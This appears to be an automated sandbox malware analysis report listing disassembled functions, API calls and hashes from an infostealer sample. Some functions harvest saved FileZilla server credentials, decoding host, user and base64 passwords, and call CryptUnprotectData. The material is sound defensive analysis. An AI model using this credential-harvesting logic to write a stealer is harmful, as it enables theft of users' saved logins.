                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: BinaryCryptString
                                                                                    • String ID:
                                                                                    • API String ID: 80407269-0
                                                                                    • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                                                    • Instruction ID: 54039329eb41a252cc530461e34d79a5024912ef9a13bed4c44d09419c35d99c
                                                                                    • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                                                    • Instruction Fuzzy Hash: 1A113674204218BFDB00CFA5D898FAA33AAAF9A348F108558F9098B350C371EC46DB60
                                                                                    Function 00418EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: BinaryCryptString
                                                                                    • String ID:
                                                                                    • API String ID: 80407269-0
                                                                                    • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                                                    • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                                                                    • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                                                    • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                                                                    Function 02D19D27 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02D15155,00000000,00000000), ref: 02D19D56
                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,02D15155,00000000,?), ref: 02D19D68
                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02D15155,00000000,00000000), ref: 02D19D91
                                                                                    • LocalFree.KERNEL32(?,?,?,?,02D15155,00000000,?), ref: 02D19DA6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                                                    • String ID:
                                                                                    • API String ID: 4291131564-0
                                                                                    • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                                                    • Instruction ID: e23b32bdc703e29b04fb6a98c678dde8e878c32f5c141a80d127e35ddbc4d79c
                                                                                    • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                                                    • Instruction Fuzzy Hash: 8E11A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208058FD159B390C776A901CB90
                                                                                    Function 02D19DC7 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02D19DEB
                                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 02D19E0A
                                                                                    • memcpy.MSVCRT(?,?,?), ref: 02D19E2D
                                                                                    • LocalFree.KERNEL32(?), ref: 02D19E3A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                    • String ID:
                                                                                    • API String ID: 3243516280-0
                                                                                    • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                                                    • Instruction ID: 6744f8c165c85bc40b84f8c67fc5f6ecb335cf8117ebca467cda1e0472bad879
                                                                                    • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                                                    • Instruction Fuzzy Hash: F811F7B8A00209EFDB04CFA8D985AEEB7B9FF89304F104558E915A7350D730AE10CFA1
                                                                                    Function 00409B60 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                                                    • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                                                    • LocalFree.KERNEL32(?), ref: 00409BD3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                    • String ID:
                                                                                    • API String ID: 3243516280-0
                                                                                    • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                                                    • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                                                                    • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                                                    • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                                                                    Function 00417A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02E39AE8,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02E39AE8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02E39AE8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                                                                    • wsprintfA.USER32 ref: 00417AB7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 362916592-0
                                                                                    • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                                                    • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                                                                    • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                                                    • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                                                                    Function 02D2D1D3 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: free
                                                                                    • String ID:
                                                                                    • API String ID: 1294909896-0
                                                                                    • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                                                    • Instruction ID: e8e32400d2a05627e2e8e272c90ebcdf45a739c1cea46684587a94f117dae0f6
                                                                                    • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                                                    • Instruction Fuzzy Hash: D971E531451B62DBD7633B31DD01E4A7AA3FF2430AF104924A1DB28730AE226C699F61
                                                                                    Function 00410250 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 363stringmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                    • strtok_s.MSVCRT ref: 0041031B
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00410393
                                                                                      • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                                                      • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00410427
                                                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00410475
                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                                                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                                                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                                                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                                                                    • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                                                                    • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                                                                    • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                                                                    • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                                                                    • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                                                                    • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                                                                    • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                                                                    • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                                                                    • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                                                                    • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                                                                    • strtok_s.MSVCRT ref: 00410679
                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                                                                    • memset.MSVCRT ref: 004106DD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                    • API String ID: 337689325-514892060
                                                                                    • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                                                    • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                                                                    • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                                                    • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                                                                    Function 02D14827 Relevance: 51.1, APIs: 34, Instructions: 114stringmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlen.KERNEL32(00424DA0), ref: 02D14833
                                                                                    • lstrlen.KERNEL32(00424E50), ref: 02D1483E
                                                                                    • lstrlen.KERNEL32(00424F18), ref: 02D14849
                                                                                    • lstrlen.KERNEL32(00424FD0), ref: 02D14854
                                                                                    • lstrlen.KERNEL32(00425078), ref: 02D1485F
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02D1486E
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D14875
                                                                                    • lstrlen.KERNEL32(00425120), ref: 02D14883
                                                                                    • lstrlen.KERNEL32(004251C8), ref: 02D1488E
                                                                                    • lstrlen.KERNEL32(00425270), ref: 02D14899
                                                                                    • lstrlen.KERNEL32(00425318), ref: 02D148A4
                                                                                    • lstrlen.KERNEL32(004253C0), ref: 02D148AF
                                                                                    • lstrlen.KERNEL32(00425468), ref: 02D148C3
                                                                                    • lstrlen.KERNEL32(00425510), ref: 02D148CE
                                                                                    • lstrlen.KERNEL32(004255B8), ref: 02D148D9
                                                                                    • lstrlen.KERNEL32(00425660), ref: 02D148E4
                                                                                    • lstrlen.KERNEL32(00425708), ref: 02D148EF
                                                                                    • lstrlen.KERNEL32(004257B0), ref: 02D14918
                                                                                    • lstrlen.KERNEL32(00425858), ref: 02D14923
                                                                                    • lstrlen.KERNEL32(00425920), ref: 02D1492E
                                                                                    • lstrlen.KERNEL32(004259C8), ref: 02D14939
                                                                                    • lstrlen.KERNEL32(00425A70), ref: 02D14944
                                                                                    • strlen.MSVCRT ref: 02D14957
                                                                                    • lstrlen.KERNEL32(00425B18), ref: 02D1497F
                                                                                    • lstrlen.KERNEL32(00425BC0), ref: 02D1498A
                                                                                    • lstrlen.KERNEL32(00425C68), ref: 02D14995
                                                                                    • lstrlen.KERNEL32(00425D10), ref: 02D149A0
                                                                                    • lstrlen.KERNEL32(00425DB8), ref: 02D149AB
                                                                                    • lstrlen.KERNEL32(00425E60), ref: 02D149BB
                                                                                    • lstrlen.KERNEL32(00425F08), ref: 02D149C6
                                                                                    • lstrlen.KERNEL32(00425FB0), ref: 02D149D1
                                                                                    • lstrlen.KERNEL32(00426058), ref: 02D149DC
                                                                                    • lstrlen.KERNEL32(00426100), ref: 02D149E7
                                                                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 02D14A03
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2127927946-0
                                                                                    • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                                                    • Instruction ID: e5cbec5d31552cd2b53303f7a77f87b25a435778279ab293d26994dde0ef25a0
                                                                                    • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                                                    • Instruction Fuzzy Hash: 5341CA79740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90295190CBB5D5019B3D
                                                                                    Function 02D29AC7 Relevance: 49.7, APIs: 33, Instructions: 212libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 02D29B08
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 02D29B21
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 02D29B39
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 02D29B51
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 02D29B6A
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 02D29B82
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 02D29B9A
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 02D29BB3
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 02D29BCB
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 02D29BE3
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 02D29BFC
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 02D29C14
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 02D29C2C
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 02D29C45
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 02D29C5D
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 02D29C75
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 02D29C8E
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 02D29CA6
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 02D29CBE
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 02D29CD7
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 02D29CEF
                                                                                    • LoadLibraryA.KERNEL32(0064A550,?,02D26C67), ref: 02D29D01
                                                                                    • LoadLibraryA.KERNEL32(0064A17C,?,02D26C67), ref: 02D29D12
                                                                                    • LoadLibraryA.KERNEL32(0064A104,?,02D26C67), ref: 02D29D24
                                                                                    • LoadLibraryA.KERNEL32(0064A1DC,?,02D26C67), ref: 02D29D36
                                                                                    • LoadLibraryA.KERNEL32(0064A328,?,02D26C67), ref: 02D29D47
                                                                                    • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 02D29D69
                                                                                    • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 02D29D8A
                                                                                    • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 02D29DA2
                                                                                    • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 02D29DC4
                                                                                    • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 02D29DE5
                                                                                    • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 02D29E06
                                                                                    • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 02D29E1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 2238633743-0
                                                                                    • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                                                    • Instruction ID: 9a46828508de6c0879a7f5fd6feead2daaf6dd9df55b6b7e50db85a22b6e179f
                                                                                    • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                                                    • Instruction Fuzzy Hash: 58A14DBD5C0240BFE354EFE8ED989963BFBF74E201714661AE605C3264D739A841DB12
                                                                                    Function 02D204B7 Relevance: 48.4, APIs: 32, Instructions: 363stringmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D29047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D29072
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D19C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02D19C53
                                                                                      • Part of subcall function 02D19C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02D19C78
                                                                                      • Part of subcall function 02D19C27: LocalAlloc.KERNEL32(00000040,?), ref: 02D19C98
                                                                                      • Part of subcall function 02D19C27: ReadFile.KERNEL32(000000FF,?,00000000,02D116F6,00000000), ref: 02D19CC1
                                                                                      • Part of subcall function 02D19C27: LocalFree.KERNEL32(02D116F6), ref: 02D19CF7
                                                                                      • Part of subcall function 02D19C27: CloseHandle.KERNEL32(000000FF), ref: 02D19D01
                                                                                      • Part of subcall function 02D29097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02D290B9
                                                                                    • strtok_s.MSVCRT ref: 02D20582
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 02D205C9
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D205D0
                                                                                    • StrStrA.SHLWAPI(00000000,00421618), ref: 02D205EC
                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D205FA
                                                                                      • Part of subcall function 02D28B47: malloc.MSVCRT ref: 02D28B4F
                                                                                      • Part of subcall function 02D28B47: strncpy.MSVCRT ref: 02D28B6A
                                                                                    • StrStrA.SHLWAPI(00000000,00421620), ref: 02D20636
                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D20644
                                                                                    • StrStrA.SHLWAPI(00000000,00421628), ref: 02D20680
                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D2068E
                                                                                    • StrStrA.SHLWAPI(00000000,00421630), ref: 02D206CA
                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D206DC
                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D20769
                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D20781
                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D20799
                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D207B1
                                                                                    • lstrcat.KERNEL32(?,0042164C), ref: 02D207C9
                                                                                    • lstrcat.KERNEL32(?,00421660), ref: 02D207D8
                                                                                    • lstrcat.KERNEL32(?,00421670), ref: 02D207E7
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D207FA
                                                                                    • lstrcat.KERNEL32(?,00421678), ref: 02D20809
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D2081C
                                                                                    • lstrcat.KERNEL32(?,0042167C), ref: 02D2082B
                                                                                    • lstrcat.KERNEL32(?,00421680), ref: 02D2083A
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D2084D
                                                                                    • lstrcat.KERNEL32(?,00421688), ref: 02D2085C
                                                                                    • lstrcat.KERNEL32(?,0042168C), ref: 02D2086B
